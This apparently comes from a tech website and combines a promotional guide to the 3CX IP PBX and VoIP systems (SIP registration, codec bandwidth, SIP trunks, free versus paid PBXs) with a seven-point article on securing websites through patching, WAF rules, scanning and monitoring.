3cx ip pbx smartphone iphone clientThanks to its support for any SIP-based IP phone and mobile device (iPhone, Android, iPad, Tablet etc.) the 3CX IP PBX has quickly become the No.1 preferred solution.

3CX’s commitment to its customers and product is outstanding with regular updates covering its main UC PBX product but also mobile device clients - ensuring customers are not left with long outstanding problems or bugs. 3CX recently announced a number of bug fixes and enhancements for the 3CX Client for Android but also the 3CX Client for Mac confirming once again that it’s determined not to leave customers in the dark and continually improve its services and product’s quality.

Read The Ultimate Guide to IP PBX and VoIP Systems - The Best Free IP PBXs For Businesses article for more information on the 3CX UC solution.


3CX Unified Communication Leading Free IP PBX Brings Linux Edition On-Par with Windows Edition

3CX Free IP PBX Unified Communications Solution3CX, developer of the software-based unified communications solution, has announced the release of 3CX V15 Service Pack 5 which brings the final Linux version of the PBX. The update achieves complete feature parity with the popular Windows version of the software. The company also reports that SP5 has added further automation of admin management tasks and made hosting of the system in the cloud easier with leading cloud providers.

3CX Unified Communication Suite and Capabilities

Read our Ultimate Guide to IP PBX - Unified Communications - The Best Free IP PBXs for Today's Businesses

Improvements to Auto Updates / Backups

  • Automatic uploading of backups to a Google Drive Account.
  • Automatic restoration of backups to another instance with failover.
  • Easier configuration of failover.
  • Automatic installation of OS security updates for Debian.
  • Automatic installation of 3CX tested product updates.
  • Automatic downloads of tested phone firmwares and alerts for outdated firmware.
  • A Labs feature to test upcoming updates released for BETA.
  • Digital receptionists can be configured as a wake-up call service extension.
  • GMail or Office 365 accounts can be more easily configured for notification emails from the PBX.
  • Improved DID source identification.
  • Windows and Mac clients are now bundled with the main install.
  • Automatic push of chat messages to the iOS and Android smartphone clients.

The Ultimate Guide to IP PBX and VoIP Systems. The Best Free IP PBXs For Businesses

3CX Unified CommunicationsVoIP/ IP PBXs and Unified Communication systems have become extremely popular the past decade and are the No.1 preference when upgrading an existing or installing a new phone system. IP PBXs are based on the IP protocol allowing them to use the existing network infrastructure and deliver enhanced communication services that help organizations collaborate and communicate from anywhere in the world with minimum or no costs.

This article explains the fundamentals of IP PBX systems, how IP PBXs work, what are their critical VoIP components, explains how they can connect to the outside world and shows how companies can use their IP PBX – Unified Communications system to save costs. We also take a look at the best Free VoIP PBX systems and explain why they are suitable for any size small-to-medium organization.

VOIP PBX – The Evolution of Telephone Systems

Traditional, Private Branch Exchange (PBX) telephone systems have changed a lot since the spread of the internet. Slowly but surely, businesses are phasing out analogue systems and replacing them with IP PBX alternatives.

A traditional PBX system features an exchange box on the organization’s premises where analogue and digital phones connect alongside external PSTN/ISDN lines from the telecommunication company (telco). It gives the company full ownership, but is expensive to setup and most frequently requires a specialist technician to maintain, repair and make changes.

Analogue-Digital PBX with phones and two ISDN PRI lines 

A typical Analogue-Digital PBX with phones and two ISDN PRI lines

Upgrading to support additional internal extensions would usually translate to additional hardware cards being installed in the PBX system plus more telephone cabling to accommodate the new phones. When a company reached its PBX maximum capacity (either phones or PSTN/ISDN lines) it would need to move to a larger PBX, resulting in additional costs.

IP PBXs, also known as VoIP systems or Unified Communication solutions, began penetrating the global PBX market around 2005 as they offered everything a high-end PBX offered, integrated much better with desktop applications and software (e.g. Outlook, CRMs, etc.) and supported a number of important features traditional PBXs were not able to deliver. IP PBX and Unified Communication systems such as 3CX are able to deliver features such as:

  • Integration with existing network infrastructure
  • Minimizing the cost of upgrades
  • Using existing equipment such as analogue phones, faxes etc.
  • Desktop/mobile softphones that replaced the need for physical phone devices
  • Delivering full phone services to remote offices without requiring separate PBX
  • Allowing mobile users to access their internal extension via VPN or other secure means
  • User-friendly Web-based management interface
  • Support for virtualized-environments that increased redundancy level and dramatically decreased backup/redundancy costs
  • Supported third party software and hardware devices via non-proprietary communication protocols such as Session Initiation Protocol (SIP)
  • Using alternative Telecommunication providers via the internet for cheaper call rates

The features offered by IP PBXs made them an increasingly popular alternative for organizations that were seeking to reduce telecommunication cost while increasing productivity and moving away from the vendor-proprietary solutions.

Why Businesses are Moving to IP PBX solutions

According to surveys made back in 2013, 96% of Australian businesses were already using IP PBXs. Today it’s clear that the solution has huge advantages. IP PBX offers businesses increased flexibility, reduced running costs, and great features, without a premium. There are so many advantages that it’s difficult for organizations to justify traditional analogue/digital PBXs. Even market leaders in the PBX market such as Siemens, Panasonic, Alcatel and others had to adapt to the rapidly changing telecommunications market and produce hybrid models that supported IP PBX features and IP phones, but these were still limited when compared with a full IP PBX solution.

When an IP PBX is installed on-site it uses the existing LAN network, resulting in low latency and less room for interference. It’s also much easier to install than other PBX systems. Network engineers and Administrators can easily configure and manage an IP PBX system as most distributions come with a simple user interface. This means system and phone settings, call routing, call reporting, bandwidth usage and other settings can be seen and configured in a simple browser window. In some cases, employees can even configure their own preferences to suit their workflow.

Once installed, an IP PBX can run on the existing network, as opposed to a whole telephone infrastructure across business premises. That means less cable management and the ability to use existing Ethernet cables, resulting in smaller starting costs. This reduction in starter costs can be even more significant if the company has multiple branches in different places. Internet Leased Lines with unlimited usage plans mean voice calls can be transmitted over WAN IP at no extra cost.

In addition, firms can use Session Initiation Protocol (SIP) trunking to reduce phone bills for most calls. Communications are routed to the Telco using a SIP trunk via the IP PBX directly or a Voice Gateway. SIP is an IP-based protocol which means the Telco can either provide a dedicated leased line directly into the organization’s premises or the customer can connect to a Telco’s SIP server via the internet. Usually main Telco lines are provided via a dedicated IP-based circuit to ensure line stability and low latency.

With SIP trunks, Telco providers usually offer heavily reduced prices over traditional methods such as PSTN or ISDN circuits. This is especially true for long-distance calls, where communication costs a fraction of the price compared to older digital circuits.

Savings on calls via SIP trunk providers can be so significant that many companies with old Legacy PBXs have installed an IP PBX that acts as a Voice Gateway, which routes calls to a SIP provider as shown in the diagram below:

Connecting an Analogue-Digital PBX with a SIP Provider via a Voice Gateway 

Connecting an Analogue-Digital PBX with a SIP Provider via a Voice Gateway

In this example an IP PBX with Voice Gateway (VG) capabilities is installed at the organization. The Voice Gateway connects on one end with the Analogue - Digital PBX using an ISDN BRI interface providing up to 2 concurrent calls while at the other end it connects with a SIP provider via IP.

The SIP provider can be reached via the internet, usually using a dedicated internet connection, or even a leased line if the SIP provider has such capabilities. The Analogue - Digital PBX is then programmed to route all local and national calls via the current telco while all international calls are routed to the SIP provider via the Voice Gateway.

The organization is now able to take advantage of the low call costs offered by the SIP provider.

The digital nature of IP PBX makes it more mobile. Softphone applications support IP PBX and let users make calls over the internet from their smartphone or computer. This allows for huge portability while retaining the same extension number. Furthermore, this often comes at a flat rate, avoiding per-minute fees. Advanced Softphones support a number of great features such as call recording, caller ID choice, transfer, hold, voice mail integration, corporate directory, just to name a few.

A great example is 3CX’s Free Windows softphone, which is a great compact application under continuous development that delivers everything a mobile desktop user would need to communicate with the office and customers while on the road or working from home:

3CX windows softphone client & Presence

3CX Windows Softphone and Presence application

IP PBX, being a pure-IP based solution, means that users are able to relocate between offices or desks without requiring changes to the cabled infrastructure. IP phones can be disconnected from their current location and reconnected at their new one. With the help of a DHCP server the IP phone will automatically reconfigure and connect to the IP PBX with the user’s internal extension and settings.

A technology called Fixed Mobile Convergence or Follow-me can even allow employees to make a landline call on their mobile using WiFi, then move to cellular once they get out of range. The cellular calls can be routed through the IP PBX when on-site through their IP phone or local network. When users are off-site the mobility client automatically registers with the organization’s IP PBX via the internet extending the user’s internal extension to the mobile client. Calls are automatically routed to the mobile client without the caller or co-workers being aware.

Another big advantage is the unification of communications. Rather than a separate hardware phone, email, voicemail and more, companies can roll them into one system. In many cases, softphones can be integrated into the existing software such as Outlook, CRM, ERP and more. What’s more, employees can receive voicemails and faxes straight to their email inbox.

That’s not to say VoIP is without flaws. For a start, it relies heavily on the network, so issues can bring the call system down if a backup isn’t implemented or there are big network problems. It’s also less applicable for emergency services because support for such calls is limited. A lot of VoIP providers offer inadequate functionality and the communications are often untraceable. Though an IP PBX is the best solution for most businesses, it depends on the individual circumstances.

Main Components of a Modern Unified Communication IP PBX

A Unified Communication IP PBX system is made from a series of important components. Firstly, you have the computer needed to run the IP PBX software. This is the Call Control server that manages all endpoint devices, Call routing, voice gateways and more.

The IP PBX software is loaded on the server and configured by the Network Administrator. Depending on the vendor the IP PBX can be integrated into a physical device such as a router e.g Cisco CallManager Express or it might be a software application that can be installed on top of the server’s operating system e.g 3CX IP PBX.

In 3CX’s case, the IP PBX software can run under the Windows platform (workstation or server) or even the Linux platform. 3CX also supports Hyper-V and VMWare virtualization platforms helping dramatically increase availability and redundancy at no additional cost.

IP PBX & VoIP Network Components

IP PBX & VoIP Network Components

VoIP Gateways, aka Voice Gateways or Analogue Telephony Adaptor (ATA), play a dual role – they act as an interface between older analogue devices such as phones, faxes etc and the newer VoIP network allowing them to connect to the VoIP network. The VoIP Gateway in this case is configured with the extensions assigned to these devices and registers to the IP PBX on their behalf using the SIP protocol. When an extension assigned to an analogue device is called, the IP PBX will send the signal to the VoIP Gateway which will produce the necessary ringing signal to the analogue device and make it ring. As soon as the phone is picked up, the VoIP Gateway will connect the call acting as a “router” between the analogue device and VoIP network. ATA is usually the term used to describe a VoIP Gateway that connects a couple of analogue devices to the VoIP network.

VoIP Gateways are also used to connect an IP PBX to the Telco, normally via an ISDN (BRI or PRI) or PSTN interface. Incoming and outgoing calls will traverse the VoIP Gateway connecting the IP PBX with the rest of the world.

IP phones are the physical devices used to make and accept phone calls. Depending on the vendor and model, these can be simple phones without a display or high-end devices with colour multi-touch displays and enhanced functions such as multiple line support, speed dials, video conferencing and more. Popular vendors in this field include Cisco, GrandStream, Yealink and others. All IP phones communicate using the non-proprietary SIP protocol. This makes it easy for organizations to mix and match different hardware vendors without worrying about compatibility issues.

In the case of a softphone the application runs on a desktop computer or smartphone and is capable of providing all services similar to those of an IP phone plus a lot more. Users can also connect a headset, microphone, or speakers if needed.

3CX Android and iPhone softphone SIP client

3CX’s free SIP-based softphone for Android (left) and iPhone (right) both provide a wealth of functions no matter where users are located

However, the key part of a Unified Communication IP PBX is its ability to use this existing hardware and software to bring multiple mediums together intuitively. Outlook allows you to make softphone calls straight from the email interface, removing the need for a long lists of details.

This is combined with the integration of instant messaging so that call takers can correspond with other staff if they’re giving tech support. It can be further enhanced by desktop sharing features to see exactly what a user is doing, as well as SMS, fax, and voicemail.

More advanced Unified Communications platforms use speech recognition for automatic, searchable transcriptions of calls. Large organizations are even implementing artificial intelligence in their workflow. Microsoft’s virtual support assistant looks at what employees are doing and provides relevant advice, information, and browser pages. The ultimate goal is for an employee to obtain everything they need with minimal effort.

How an IP PBX Works

It’s important to understand how each of these components work to form a cohesive whole. Each IP phone is registered with the IP PBX server, which is usually just a specially configured PC running the Windows or Linux operating system. This OS can also be run on a virtual machine.

Advanced IP PBX systems such as 3CX support both Windows and Linux operating systems but can also be hosted on virtualized platforms such as Hyper-V and VMware, offering great value for money.

The IP PBX server creates a list that contains the Session Initiation Protocol (SIP) addresses of each phone. For the unfamiliar, SIP is the most popular protocol for transmitting telephone signalling over networks. It operates at the application layer of the OSI model and integrates elements from HTTP and SMTP. As such, the identifying SIP addresses look like a mash-up of an email address and a telephone number.

SIP Accounts

SIP endpoint accounts (IP Phones, softphones, VoIP Gateways) are configured on the IP PBX with their extension and credentials. Similarly the endpoint devices are configured with the IP PBX’s IP address and their previously configured accounts. Once the SIP endpoint device registers to the IP PBX it is ready to start placing and receiving phone calls.

SIP Endpoint Registering to an IP PBX System 

SIP Endpoint Registering to an IP PBX System
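To make the registration step more concrete, the short Python sketch below prints what a basic SIP REGISTER request from extension 101 to its PBX might look like. The addresses, extension and tags are made up for illustration, and a real registration would also have to answer the PBX's authentication challenge with digest credentials.

# Build and print an illustrative SIP REGISTER request. All values are hypothetical,
# and real endpoints additionally authenticate against the PBX (401/407 challenge).
PBX_DOMAIN = "pbx.example.com"       # hypothetical IP PBX address
EXTENSION  = "101"
PHONE_IP   = "192.168.1.50"

register = (
    f"REGISTER sip:{PBX_DOMAIN} SIP/2.0\r\n"
    f"Via: SIP/2.0/UDP {PHONE_IP}:5060;branch=z9hG4bK776asdhds\r\n"
    f"Max-Forwards: 70\r\n"
    f"From: <sip:{EXTENSION}@{PBX_DOMAIN}>;tag=456248\r\n"
    f"To: <sip:{EXTENSION}@{PBX_DOMAIN}>\r\n"
    f"Call-ID: 843817637684230@{PHONE_IP}\r\n"
    f"CSeq: 1826 REGISTER\r\n"
    f"Contact: <sip:{EXTENSION}@{PHONE_IP}:5060>\r\n"
    f"Expires: 3600\r\n"
    f"Content-Length: 0\r\n\r\n"
)
print(register)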

Once a user places a call, the system can determine if the call is going to a phone on the same system or externally. Internal calls are detected via the SIP address and routed straight to each other over LAN. External calls are routed to the Telco Provider via the Voice Gateway or a SIP trunk depending on the setup.

Naturally, these calls are made from the hardware and softphones mentioned earlier. Hardware IP phones connect to the network using a standard RJ-45 connector, replacing the older RJ-11 connectors used by the analogue telephones.

Voice Codecs – G.711, G.729, G.722

Audio signals from the IP phones must be converted into a digital format before they can be transmitted. This is done via a codec, which compresses the audio for transmission and decodes it on playback. There are several different codecs, and the one you use determines both the audio quality and the amount of bandwidth consumed.

SIP endpoints located on the LAN almost always use the G.711 codec, which has a 1:2 compression ratio and a 64Kbps bitrate plus 23.2Kbps of IP overhead, resulting in roughly 87.2Kbps per call. It delivers high, analogue-telephone quality but comes with a significant bandwidth cost, which is not a problem on local networks where speeds average 1Gbps.

When a SIP endpoint is on the road away from the office, moving to a less bandwidth-intensive codec at the expense of voice quality is usually desirable. The most commonly used codec for these cases is G.729, which provides an acceptable audio quality for just 31.2Kbps bitrate that breaks down to 8Kbps plus 23.2Kbps for the IP overhead. It’s similar to the call quality of your average cell phone.


G.711 vs G.729 Call - Bandwidth Requirements per call

G.722 delivers call quality better than even the PSTN, but is best reserved for high-bandwidth scenarios or situations where great audio quality is essential.

SIP Trunks

Finally, SIP trunks are also configured with codecs for incoming and outgoing phone calls. This is why, when connecting to an internet-based SIP provider, special consideration must be given to ensuring there is enough bandwidth to support the desired number of simultaneous calls. For example, if we wanted to connect to a SIP provider and support up to 24 simultaneous calls using the G.711 codec for high-quality audio, we would require 87.2Kbps x 24 = 2092.8Kbps of bandwidth, or 2.043Mbps at full line capacity.
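
As a quick back-of-the-envelope check, the short PHP sketch below (using the approximate per-call bitrates quoted in this article) shows how the bandwidth requirement scales with the number of simultaneous calls:

<?php
// Approximate per-call bitrates in Kbps (codec payload plus ~23.2Kbps IP overhead),
// as quoted earlier in this article
$codecs = array('G.711' => 87.2, 'G.729' => 31.2);
$simultaneousCalls = 24;

foreach ($codecs as $name => $kbpsPerCall) {
    $totalKbps = $kbpsPerCall * $simultaneousCalls;
    // Convert to Mbps using 1024, matching the figures used in the article
    printf("%s: %.1fKbps (%.2fMbps) for %d simultaneous calls\n",
           $name, $totalKbps, $totalKbps / 1024, $simultaneousCalls);
}

Running this for 24 calls reproduces the 2092.8Kbps (G.711) and 748.8Kbps (G.729) figures discussed in this article.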

Voicemail with IP PBXs

Voicemail works differently from the way it does in a traditional phone environment, where the voicemail server was typically a standalone unit or an add-in card. In IP PBX systems, voicemail is integrated into the solution and stored in a digital format. This has several advantages, including the ability to access voicemail via a web browser or mobile phone, forward voicemails to an email account, forward a voicemail to multiple recipients via email and many more.

In addition, some IP PBXs can be configured to automatically call the person for whom a voicemail was left and play back any messages in their mailbox.

How an IP PBX Can Help Save Money

Once you understand the fundamental differences between an IP PBX and legacy analogue/digital PBXs, it becomes clearer how an organization can save.

Because an IP PBX runs on the existing network infrastructure, there’s no need for separate cabling. This negates a significant chunk of the setup costs, as does the simplicity of installation; the initial investment can be up to ten times less than traditional PSTN systems. It also means a huge reduction in service costs: with no separate physical wiring, there is no dedicated cabling to damage, repair or maintain. Moving between offices becomes an easy task, as no cable patching is required from the IP PBX to the IP phone. All that’s required is a data port to connect the IP phone, or an access point in the case of a wireless client (laptop, mobile device) with a softphone.

Maintenance of the underlying systems is also far easier. Most IP PBX systems run on either Linux or Windows, operating systems that technicians are usually intimately familiar with. This means technical problems often don’t need to be outsourced. When a patch or upgrade is available from the vendor, the administrator can quickly create a snapshot of the IP PBX system via the virtualization environment and proceed with the installation. In the unlikely event that the system doesn’t behave as expected, the administrator can roll back to the system’s previous state with the click of a button.

Upgrading the IP PBX to further extend its functionality is far more cost and time efficient compared to older PBXs. In most cases, new features are just a matter of purchasing an add-on or plugin and installing it. This scalability extends to the reach of the system itself. Traditional phone systems only have a certain number of ports that phones can be connected to. Once you reach that limit it will cost a significant amount to replace the existing system. With IP PBX, this isn’t an issue. IP phones connect via the network and aren’t limited by the same kind of physical factors.

As already noted, some IP PBX providers support running on a virtual platform. 3CX is one of the most popular and stable solutions that officially support both Hyper-V and VMware. This functionality means you can create low-cost backups of the system.

The savings are even more prominent when you consider the price of VoIP compared to traditional PBX. SIP trunking can result in huge monthly savings of around 40%, depending on usage. If the business regularly makes calls abroad, there’s room for even more savings as it won’t be subject to hefty international fees.

The 3CX Management Console is packed with functionality, settings, call analysis and monitoring (click to enlarge)

Furthermore, extending the maximum number of simultaneous calls on a SIP trunk is an easy process, usually requiring only changes to the SIP account and additional bandwidth towards the SIP provider. These changes can generally be made in a few days. With traditional ISDN or PSTN lines, the organization would need to order the additional lines from the Telco and wait up to a few weeks for the new lines to be physically installed. Then there is the additional monthly service fee charged by the Telco regardless of the new lines’ usage. Most of these costs do not exist with SIP providers and SIP trunks, making them a much cheaper and faster solution. Most US, UK and Australian Telco providers are now moving from ISDN to SIP trunking, making it only a matter of time until ISDN is no longer offered as standard.

Companies can also choose to use codecs such as G.729 instead of G.711 with their SIP provider, sacrificing some voice quality to reduce their SIP trunking bandwidth requirements by roughly 64%. For example, a SIP trunk using the G.711 codec and supporting up to 24 simultaneous calls requires 87.2Kbps x 24 = 2092.8Kbps of bandwidth, or 2.043Mbps at full line capacity.


ISDN T1 Bandwidth requirements - G.711 vs G.729

With G.729 the same SIP trunk would require 31.2Kbps x 24 = 748.8Kbps of bandwidth or 0.73Mbps during full line capacity!

In addition to these direct savings, the advanced features offered by IP PBXs and their flexibility can result in a huge increase in productivity. The ability to communicate efficiently with colleagues and customers often results in higher satisfaction, increased work output and more profit.

All of this adds up to some huge cost savings, with estimates of up to 80% over an extended period. Not only are IP PBX systems cheaper to set up, they’re cheaper to maintain, upgrade, scale and remove.

Free IP PBXs vs Paid

It’s often tempting to cut costs further by opting for a free IP PBX solution. However, these often lack the support and features of a paid alternative. Most providers put a limit on outgoing calls, though the absence of important VoIP and Unified Communications features is usually the main problem, severely limiting the system’s functionality. Solutions such as 3CX offer full product functionality with up to 8 simultaneous calls at no cost, making them an ideal VoIP system for startups and small companies.

The security of some free providers has also been brought into question. Asterisk has been hacked on several occasions, though its security has since been hardened significantly. While no system is completely secure, paid providers often have dedicated security teams and ensure systems are hard to penetrate by default, rather than requiring extra configuration or expertise that the end customer might not have.

Low-cost editions come with a multitude of other features. Application integration is a big one: 3CX’s Pro plan offers Outlook, Salesforce, Microsoft Dynamics, Sugar CRM, Google Contacts and more.

Paid editions are also a must for unified communications features such as video calls, conferencing and integrated fax servers. The number of participants that can join a conference call is also higher with subscription-based versions of 3CX.

These advanced features extend to calls, with inbuilt support for call recording, queuing and parking. 3CX even offers a management suite for call recordings, saving the need to set up additional software. In paid versions, functionality like this is more likely to extend to Android, iOS, and other platforms.

However, perhaps the most important advantage is the amount of support offered by subscription-based services. Higher profits mean they can offer prompt, dedicated support, compared with the often slow and limited services of free providers. Though a paid service isn’t always essential, the extra productivity and support it brings is usually well worth the price – especially when considering the negative impact a technical IP telephony issue can have on the organization.

Popular Free/Low-Cost IP PBX Solutions

That said, small businesses can probably get away with a free IP PBX solution. There are reputable, open-source solutions out there completely free of charge. The biggest, most popular one is Asterisk. The toolkit has been going for years, and has a growing list of features that begins to close the gap between free and subscription-based versions.

Asterisk supports interactive voice menus, voicemail, automatic call distribution and conference calling. It’s still a way off premium services due to many of the reasons above, but it’s about as good as it gets without shelling out.

Despite that, there are still some notable competitors. Many of them started as branches of Asterisk, which tends to happen in the open source community. Elastix is one of these and provides unified communications server software with email, IM, IP PBX, collaboration and faxing. The interface is a bit simpler than its grandfather’s, and it pulls in other open source projects such as Openfire, HylaFax and Postfix to offer a more well-rounded feature line-up.

SIP Foundry, on the other hand, isn’t based on Asterisk, and is considered as much of a competitor as there can be. Its feature list is much the same as Asterisk’s, but it is marketed more towards businesses looking to build their own bespoke system. That’s where SIP Foundry’s business model comes in, selling support to companies for a substantial $495 US per month for 100 users.

Other open source software has a focus on security. Kamailio has been around for over fifteen years and supports asynchronous TCP, UDP and TLS to secure VoIP voice, video and text, as well as WebRTC. This combines with authentication and authorization as well as load balancing and routing failover to deliver a very secure experience. The caveat is that Kamailio can be more difficult to configure, and admins need considerable knowledge of SIP.

Then there’s 3CX. The company provides a well-featured free experience that has more than enough to get someone started with an IP PBX. All the essential features are there, from call logging, to voicemail, to one-click conferencing. However, 3CX also offers more for those who want it, including some very powerful tools. The paid versions of 3CX are still affordable, but offer the same features as some of the most expensive solutions on the market, with almost unprecedented application integration and smart call centre abilities at a reasonable price.

3CX also supports a huge range of IP phones, VoIP Gateways, and any SIP Trunk provider. The company works with a huge list of providers across the world to create pre-configured SIP Trunk templates for a plug and play setup. These templates are updated and tested with every single release, ensuring the user has a problem-free experience. What’s more, powerful, intuitive softphone technology is built straight into the switchboard, including drag and drop calls, incoming call management, and more.

Unified Communications features include mobility clients with advanced messaging and presence features that allow you to see if another user is available, on a call or busy. Click-to-call features can be embedded on the organization’s website, allowing visitors to call the company with a click of a button through their web browser. Advanced Unified Communications features such as 3CX WebMeeting enable video calling directly from your organization’s website, so website visitors can initiate a video call to your sales team with a click of a button.

 3cx web conferencing

3CX WebMeeting enables clientless video conferencing/presentation from any web browser

Employees can also use 3CX WebMeeting to communicate with colleagues in different physical locations and give presentations, sharing videos, PowerPoint presentations, Word documents, Excel spreadsheets, their desktop or any other application. Many of these features are not even offered in larger high-end enterprise solutions, or would cost thousands of dollars to purchase and maintain.

3CX has also introduced VoIP services and functionality suitable for hotels making their system an ideal Hotel-Based VoIP system.

Downloading the free 3CX IP PBX system is well worth the time and effort for organizations seeking to replace or upgrade their PBX system at minimal or no cost.

Summary

IP PBXs offer so many advantages over traditional PBXs that implementation is close to a no-brainer. An IP PBX is cheaper in almost every way, while still providing advanced features that just aren’t possible with other systems. The ability to intelligently manage incoming and outgoing calls, create conference calls on the fly and use advanced mobility features that make it possible to work from home is almost essential in this day and age. Add to that the greatly reduced time and resources needed to upgrade, and you have a versatile, expandable system which won’t fall behind the competition.

Though some of these benefits can be had with completely free IP PBX solutions, paid services often come with tools that can speed up workflow and management considerably. The returns gained from integration of Microsoft Dynamics, Office 365, Salesforce and Sugar CRM are often well worth the extra cost.

However, such functionality doesn’t have to be expensive. Low-cost solutions like 3CX offer incredible value for money and plans that can be consistently upgraded to meet growing needs. The company lets you scale from a completely free version to a paid one, making it one of the best matches out there for any business size.


7 Security Tips to Protect Your Websites & Web Server From Hackers

Recent and continuous website security breaches at large organizations, federal government agencies, banks and thousands of companies worldwide have once again verified the importance of website and web application security to prevent hackers from gaining access to sensitive data while keeping corporate websites as safe as possible. Many encounter a lot of problems when it comes to web application security; it is a pretty heavy field to dig into.

Some security professionals would not be able to provide all the necessary steps and precautions to deter malicious users from abusing your web application. Many web developers will encounter some form of difficulty while attempting to secure their website, which is understandable since web application security is a multi-faceted concept, where an attacker could make use of thousands of different exploits that could be present on your website.

Although no single list of web security tips and tricks can be considered complete (in fact, one of the tips is that the amount of knowledge, information and precautions you can implement is never enough), the following is as close as you can get. We have listed the concepts and practices below to aid you in securing your website which, as we already mentioned, is anything but straightforward. These points will get you started and nudge you in the right direction, keeping in mind that some factors in web application security are considered a higher priority than others.

1. Hosting Options

Without web hosting services most websites would not exist. The most popular methods to host web applications are: dedicated hosting, where your web application is hosted on a server intended for your website only, and shared hosting, where you share a web server with other users who in turn run their own web applications on the same server.

There are multiple benefits to using shared hosting. Mainly, this option is cheaper than having your own dedicated server, which generally attracts smaller companies that prefer to share hosting space. The difference between shared and dedicated hosting may seem irrelevant from a functionality point of view, since the website will still run; however, when discussing security we need to look at it from a completely different perspective.

The downsides of shared hosting trump any advantages it may offer. Since the web server is shared between multiple web applications, any attacks are also shared between them. For example, if you share your web server with an organisation whose website has been targeted by attackers launching Denial of Service attacks, your web application will also be affected, since it is hosted on the same server and draws from the same resource pool. Meanwhile, the absence of complete control over the web server itself allows the provider to take decisions that may place your web application at risk of being exploited. If one of the websites hosted on the shared server is vulnerable, there is a chance that all the other websites and the web server itself could be exploited. Read more about web server security.

2. Performing Code Reviews

Most successful attacks against web applications are due to insecure code and not the underlying platform itself. Case in point: SQL Injection attacks are still the most common type of attack even though the vulnerability itself has been around for over 20 years. This vulnerability does not occur due to incorrect input handling by the database system itself; it is entirely related to the fact that input sanitization is not implemented by the developer, which leads to untrusted input being processed without any filtering.

This reasoning applies mainly to injection attacks and, normally, inspecting code is not this straightforward. If you are using a pre-built application, updating to the latest version helps ensure that your web application does not contain known insecure code, while if you are using custom-built apps, an in-depth code review by your development team will be required. Whichever application type you are using, securing your code is a critical step, or else the very base of the web application will be flawed and therefore vulnerable.
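
As a minimal illustration of the kind of flaw a code review should catch, consider a hypothetical PHP handler that reads a numeric ID from the query string; the variable names below are made up for this sketch:

<?php
// Unsafe: the raw query-string value could contain anything, including SQL syntax
$id = $_GET['id'];

// Safer: enforce the expected data type before the value is used anywhere
$id = filter_var(isset($_GET['id']) ? $_GET['id'] : '', FILTER_VALIDATE_INT);
if ($id === false) {
    http_response_code(400);   // reject anything that is not a plain integer
    exit('Invalid id');
}

A reviewer looking for this pattern, raw user input reaching a query or file path without validation, will catch a large share of the issues described above.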

3. Keeping Software Up To Date

When using software that has been developed by a third party, the best way to ensure that the code is secure is to apply the latest updates. A simple web application will make use of numerous components that can lead to successful attacks if left unpatched. For example, both PHP and MySQL were vulnerable to exploits at some point in time but were later patched, and a default Linux web server installation will include multiple services, all of which need to be updated regularly to avoid vulnerable builds of software being exploited.

The importance of updating can be seen from the Heartbleed vulnerability discovered in OpenSSL, which is used by most web applications that serve their content via HTTPS. That being said, patching these vulnerabilities is an easy task: once the appropriate patch has been released, you simply need to update your software. This process differs for every operating system or service although, just as an example of how easy it is, updating packages on Debian-based servers only requires you to run a couple of commands.
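
For example, on a Debian-based server the updates are typically applied with commands along these lines (run as root or prefixed with sudo); the exact package manager and options may vary by distribution:

apt-get update     # refresh the package lists from the configured repositories
apt-get upgrade    # install the latest available versions of all installed packages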

4. Defending From Unauthorised Intrusions

While updating software will ensure that no known vulnerabilities are present on your system, there may still be entry points, missed by our previous tips, through which an attacker can access your system. This is where firewalls come into play. A firewall is necessary as it limits traffic depending on your configuration, and one can be found on most operating systems by default.

That being said, a firewall will only be able to analyse network traffic, which is why implementing a Web Application Firewall (WAF) is a must if you are hosting a web application. WAFs are best suited to identifying malicious requests that are being sent to a web server. If the WAF identifies an SQL Injection payload in a request, it will drop that request before it reaches the web server. If the WAF does not intercept a particular kind of request out of the box, you can also set up custom rules for the requests that need to be blocked. If you are wondering which requests you can block even before your WAF can, take a look at our next tip.
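
As a rough sketch of what such a custom rule might look like, the following uses the syntax of ModSecurity, a popular open-source WAF; the rule id, pattern and message are illustrative only:

# Drop any request whose parameters contain a UNION SELECT pattern
SecRule ARGS "@rx (?i)union\s+select" \
    "id:100001,phase:2,deny,status:403,msg:'Possible SQL injection attempt'"

A rule like this rejects the matching request with an HTTP 403 before it ever reaches the web application.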

5. Performing Web Vulnerability Scans

No amount of code reviews and updates can ensure that the end product is not vulnerable and cannot be exploited. Code reviews are limited since the executed code is not being analysed, which is why web vulnerability scanning is essential. Web scanners view the web application as a black box, analysing the finished product in a way that is not possible with white-box scanning or code reviews. Some scanners also provide the option to perform grey-box scanning, combining website scans with a backend agent that can analyse code.

As complex and large as web applications are nowadays, it would be easy to miss certain vulnerabilities while performing a manual penetration test. Web vulnerability scanners automate this process for you, covering a larger website in less time while detecting most known vulnerabilities. One notorious vulnerability that is difficult to identify is DOM-based XSS, although web scanners are still able to identify such issues. Web vulnerability scanners will also provide you with the requests that you need to block on your Web Application Firewall (WAF) while you are working to fix these vulnerabilities.

6. Importance Of Monitoring

It is imperative to know if your web application has been subjected to an attack. Monitoring the web application, and the server hosting it, is the best way to ensure that even if an attacker gets past your defence systems, at least you will know how, when and from where it happened. There are cases where a website is brought offline by an attack and the owner does not even find out about the incident until precious time has passed.

To avoid this you can monitor server logs, for example by enabling notifications to be triggered when a file is deleted or modified. This way, if you had not modified that particular file, you will know that someone else has unauthorised access to your server. You can also monitor uptime, which comes in handy when the attack is not as stealthy as modifying files, such as when your web server is subjected to a Denial of Service attack. Such utilities will notify you as soon as your website is down, without you having to discover the incident from the users of your website.
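
As a rough example of the file-change monitoring described above, on a Linux server the inotifywait utility from the inotify-tools package (assuming it is installed) can watch the web root and report changes as they happen; the path is illustrative:

# Watch the web root recursively and print a timestamped line for every change
inotifywait -m -r -e modify,create,delete --timefmt '%F %T' --format '%T %w%f %e' /var/www

The output can be appended to a log or piped to a script that sends an email whenever a file you did not expect to change is modified or deleted.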

The worst thing you can do when implementing monitoring services is to host them on the same web server that is being monitored. If that server were knocked down, the monitoring service would not be available to notify you.

7. Never Stop Learning

Finally, whatever you currently know about web security, it’s never enough. Never stop learning about improving your web application’s security, because literally every day brings a new exploit that may be used against your website. Zero-day attacks happen out of the blue, which is why keeping yourself updated with any new security measures that you can implement is imperative. You can find such information in the multiple web security blogs that detail how a website administrator should enforce their website’s security.


WordPress Audit Trail: Monitor Changes & Security Alerts For WordPress Blogs, Websites, e-Shops - Regulatory Compliance

